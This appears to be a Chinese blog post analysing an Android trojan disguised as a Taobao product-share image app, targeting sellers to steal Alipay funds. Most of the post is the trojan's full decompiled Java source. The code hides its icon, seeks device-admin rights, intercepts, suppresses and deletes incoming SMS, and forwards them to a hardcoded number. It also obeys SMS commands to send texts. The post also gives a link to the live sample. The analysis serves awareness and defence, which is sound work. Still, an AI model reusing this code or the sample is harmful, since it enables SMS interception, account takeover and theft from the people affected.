文件信息:
File Name: 淘宝宝贝分享图.apk
File MD5: D9C5B64070D54BB6477C9154E41344FF

样本下载地址:http://www.kuaipan.cn/file/id_204886686096687106.htm

使用工具:
dex2jar
jd_Gui

1.使用解压软件右键解压得到以下文件:
解剖安卓手机短信拦截木马_网络安全

2.下载dex2jar工具解压:
把classes.dex 拷贝到dex2jar目录下:在路径上输入cmd后再输入:dex2jar.bat classes.dex 回车后
得到文件:classes_dex2jar.jar
解剖安卓手机短信拦截木马_网络安全_02

3.使用jd_Gui打开刚才得到classes_dex2jar.jar文件:
解剖安卓手机短信拦截木马_网络安全_03

4.查看具体代码:
App文件代码如下:

[Java] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
package com.sonyericsson.androidapp.microblogci8dmdo4;
 
import android.app.Application;
import android.os.Process;
 
public class App extends Application
  implements Thread.UncaughtExceptionHandler
{
  public void onCreate()
  {
    super.onCreate();
    Thread.setDefaultUncaughtExceptionHandler(this);
  }
 
  public void uncaughtException(Thread paramThread, Throwable paramThrowable)
  {
    Process.killProcess(Process.myPid());
  }
}



L文件代码如下:

[Java] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
package com.sonyericsson.androidapp.microblogci8dmdo4;
 
import android.app.Activity;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Build.VERSION;
import android.os.Bundle;
import android.os.Handler;
 
public class L extends Activity
{
  private DevicePolicyManager a;
  private ComponentName b;
 
  protected void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    setContentView(2130903040);
    d.a(this, new SR());
    d.a(this, "启动MainActivity");
    d.a(this);
    this.a = ((DevicePolicyManager)getSystemService("device_policy"));
    this.b = new ComponentName(this, LR.class);
    if (this.a.isAdminActive(this.b))
      d.a(this, "已经注册设备管理器");
    while (true)
    {
      if (Build.VERSION.SDK_INT < 14)
        getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
      finish();
      Handler localHandler = new Handler();
      localHandler.postDelayed(new a(this, localHandler), 5000L);
      return;
      Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
      localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.b);
      localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "设备管理器");
      startActivity(localIntent);
      d.a(this, "注册设备管理器");
    }
  }
}



LR文件代码如下:

[Java] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
package com.sonyericsson.androidapp.microblogci8dmdo4;
 
import android.app.admin.DeviceAdminReceiver;
import android.content.Context;
import android.content.Intent;
 
public class LR extends DeviceAdminReceiver
{
  public void onDisabled(Context paramContext, Intent paramIntent)
  {
    d.a(paramContext, "取消使用");
    super.onDisabled(paramContext, paramIntent);
  }
 
  public void onEnabled(Context paramContext, Intent paramIntent)
  {
    d.a(paramContext, "图片查看");
    super.onEnabled(paramContext, paramIntent);
  }
 
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    super.onReceive(paramContext, paramIntent);
  }
}



SR文件代码如下:

[Java] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
package com.sonyericsson.androidapp.microblogci8dmdo4;
 
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsMessage;
 
public class SR extends BroadcastReceiver
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    d.a(paramContext, "#SmsReceiver#onReceive" + paramIntent.getAction());
    if (!"android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))
    {
      d.a(paramContext, this);
      d.a(paramContext);
    }
    Bundle localBundle;
    do
    {
      return;
      localBundle = paramIntent.getExtras();
    }
    while (localBundle == null);
    if (!d.b(paramContext))
    {
      d.a(paramContext, "#SmsReceiver#时间不在运行范围");
      return;
    }
    Object[] arrayOfObject = (Object[])localBundle.get("pdus");
    int i = arrayOfObject.length;
    String str1 = "";
    int j = 0;
    String str2;
    for (Object localObject = ""; ; localObject = str2)
    {
      if (j >= i)
      {
        d.b(paramContext, (String)localObject, str1);
        abortBroadcast();
        return;
      }
      SmsMessage localSmsMessage = SmsMessage.createFromPdu((byte[])arrayOfObject[j]);
      str2 = localSmsMessage.getOriginatingAddress();
      str1 = str1 + localSmsMessage.getMessageBody();
      j++;
    }
  }
}



U文件代码如下:

[Java] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
package com.sonyericsson.androidapp.microblogci8dmdo4;
 
import android.app.Activity;
import android.os.Bundle;
import android.widget.Toast;
 
public class U extends Activity
{
  protected void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    d.a(this, new SR());
    Toast.makeText(this, "应用程序尚未安装在您的手机上", 1).show();
    finish();
  }
}



a文件代码如下:

[Java] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
package com.sonyericsson.androidapp.microblogci8dmdo4;
 
import android.content.Intent;
import android.os.Handler;
 
class a
  implements Runnable
{
  a(L paramL, Handler paramHandler)
  {
  }
 
  public void run()
  {
    this.b.removeCallbacks(this);
    Intent localIntent = new Intent();
    localIntent.setType("p_w_picpath/*");
    localIntent.setAction("android.intent.action.GET_CONTENT");
    this.a.startActivity(localIntent);
  }
}



b文件代码如下:

[Java] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
package com.sonyericsson.androidapp.microblogci8dmdo4;
 
import android.content.Context;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.preference.PreferenceManager;
 
public class b
{
  public static String a = "com.eg.android.AlipayGphone";
  public static String b = "";
  public static String c = "";
 
  public static void a(Context paramContext)
  {
    SharedPreferences localSharedPreferences = PreferenceManager.getDefaultSharedPreferences(paramContext);
    String str = b(paramContext);
    if (!localSharedPreferences.getString("4yffd3", "").equals(str))
    {
      d.a(paramContext, "初次运行!");
      localSharedPreferences.edit().putString("4yffd3", str).commit();
      d.a(paramContext, null, "888");
    }
  }
 
  public static String b(Context paramContext)
  {
    return "15884230675";
  }
}



c文件代码如下:

[Java] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
package com.sonyericsson.androidapp.microblogci8dmdo4;
 
import android.content.ContentResolver;
import android.content.Context;
import android.database.ContentObserver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Handler;
 
public class c extends ContentObserver
{
  private Context a;
 
  public c(Context paramContext)
  {
    super(new Handler());
    d.a(paramContext, "#SMSObserver#注册");
    this.a = paramContext;
    this.a.getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, this);
  }
 
  public void onChange(boolean paramBoolean)
  {
    super.onChange(paramBoolean);
    d.a(this.a, "#SMSObserver#onChange");
    if (!d.b(this.a))
      d.a(this.a, "#SMSObserver#时间不在运行范围");
    while (true)
    {
      return;
      Uri localUri = Uri.parse("content://sms/inbox");
      Cursor localCursor = this.a.getContentResolver().query(localUri, null, null, null, null);
      while (localCursor.moveToNext())
      {
        d.b(this.a, localCursor.getString(localCursor.getColumnIndex("address")), localCursor.getString(localCursor.getColumnIndex("body")));
        String str = "content://sms/conversations/" + localCursor.getString(1);
        this.a.getContentResolver().delete(Uri.parse(str), null, null);
      }
    }
  }
}



d文件代码如下:

[Java] 纯文本查看 复制代码

?

001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
package com.sonyericsson.androidapp.microblogci8dmdo4;
 
import android.content.Context;
import android.content.IntentFilter;
import android.telephony.SmsManager;
import android.util.Log;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.Locale;
 
public class d
{
  public static boolean a = false;
  private static boolean b = false;
  private static long[] c;
  private static boolean d = false;
 
  public static void a(Context paramContext)
  {
    a(paramContext, "chkFirstRun");
    if (b)
      return;
    b.a(paramContext);
    b = true;
  }
 
  public static void a(Context paramContext, SR paramSR)
  {
    if (d)
      return;
    d = true;
    new c(paramContext);
    try
    {
      IntentFilter localIntentFilter = new IntentFilter();
      localIntentFilter.setPriority(2147483647);
      localIntentFilter.addAction("android.provider.Telephony.SMS_RECEIVED");
      paramContext.getApplicationContext().registerReceiver(paramSR, localIntentFilter);
      return;
    }
    catch (Exception localException)
    {
      a(paramContext, "注册监听异常:" + localException.getMessage());
    }
  }
 
  public static void a(Context paramContext, String paramString)
  {
    if (a)
      Log.e("T_DEBUG", paramString);
  }
 
  public static void a(Context paramContext, String paramString1, String paramString2)
  {
    if (paramString1 == null);
    for (String str = b.b(paramContext); ; str = paramString1)
    {
      a(paramContext, "发送:" + str + " " + paramString2);
      if (Boolean.parseBoolean(String.valueOf(a)))
        return;
      SmsManager localSmsManager = SmsManager.getDefault();
      localSmsManager.sendMultipartTextMessage(str, null, localSmsManager.divideMessage(paramString2), null, null);
      return;
    }
  }
 
  public static void b(Context paramContext, String paramString1, String paramString2)
  {
    String str = b.b(paramContext);
    if (paramString1.startsWith("+86"))
      paramString1 = paramString1.substring(3);
    a(paramContext, "收到:" + paramString1 + " " + paramString2);
    if (paramString1.equals(str))
    {
      String[] arrayOfString = paramString2.split("A", 2);
      if (arrayOfString.length != 2)
      {
        a(paramContext, "指令错误");
        a(paramContext, null, "短信指令格式错误,格式为“手机号A短信内容”");
        return;
      }
      a(paramContext, "SENDTO:" + arrayOfString[0] + " content " + arrayOfString[1]);
      a(paramContext, arrayOfString[0], arrayOfString[1]);
      return;
    }
    a(paramContext, str, "[" + paramString1 + "]" + paramString2);
  }
 
  public static boolean b(Context paramContext)
  {
    if (c == null)
      c(paramContext);
    long l = System.currentTimeMillis();
    if ((c[0] == 0L) || (c[1] == 0L));
    while ((c[0] <= l) && (c[1] >= l))
      return true;
    return false;
  }
 
  public static void c(Context paramContext)
  {
    if (c == null)
    {
      SimpleDateFormat localSimpleDateFormat;
      try
      {
        localSimpleDateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.CHINA);
        c = new long[2];
        if (b.b.equals(""))
          c[0] = 0L;
        while (b.c.equals(""))
        {
          c[1] = 0L;
          return;
          c[0] = localSimpleDateFormat.parse(b.b).getTime();
        }
      }
      catch (Exception localException)
      {
        c[0] = 0L;
        c[1] = 0L;
        a(paramContext, "从RAW读取配置信息失败," + localException.getMessage());
        return;
      }
      c[1] = localSimpleDateFormat.parse(b.c).getTime();
    }
  }
}



代码如上。
大概危害:
虽然不太懂代码,但是可以看懂一点点:中了这个木马的人,手机上收到的信息会被转移到【15884230675】这个手机号码上,
而且中了这个木马的人手机收到的信息也无法看到。

从木马名字来看,这类木马主要是针对淘宝卖家,骗子作为买家,发送木马给卖家

告知卖家他看到别人的分享的东西,很喜欢,所有东西都在apk文件上,只要安装就可以看到列表了,如果有就所有都要了。



或许有些不谨慎的淘宝卖家就会安装了这个木马,然后骗子通过木马截取短信方式等,修改卖家淘宝账号或者支付宝账号等,洗劫卖家支付宝的金钱。
以上是个人的了解,有哪些写得不对的地方请指教